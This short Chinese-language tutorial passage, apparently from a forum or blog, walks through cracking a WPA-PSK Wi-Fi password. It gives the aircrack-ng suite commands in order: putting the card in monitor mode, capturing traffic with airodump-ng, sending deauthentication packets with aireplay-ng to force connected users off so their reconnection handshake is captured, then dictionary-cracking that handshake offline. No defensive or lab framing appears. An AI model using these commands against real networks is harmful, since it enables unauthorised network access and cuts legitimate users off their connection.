壹般的方法是,在抓包的同時,用deauth攻擊,讓已經登錄的用戶斷線,然後用戶再次登錄時就可以抓握手包了。
不要壹直攻擊,否則合法用戶連不上。當pwr顯示的合法客戶端的數值變為0時,表示他已經掉線了。
這個過程需要多進行幾次,得親自盯著,靠全自動軟件是不行的。
sudo ifconfig wlan0
sudo airmon-ng start wlan0
sudo airodump-ng -w test mon0 -c 13
在抓包的同時進行註入攻擊
sudo aireplay-ng -0 10 -a "bssid" mon0
抓到握手包後,在airodump顯示屏幕的右上角回有顯示的,然後可以關閉無線網卡了,在本地用aircrack-ng,掛上字典,進行wpa-psk的破解。
抓握手包只是萬裏長征的第壹步,跑密碼是真正的難題。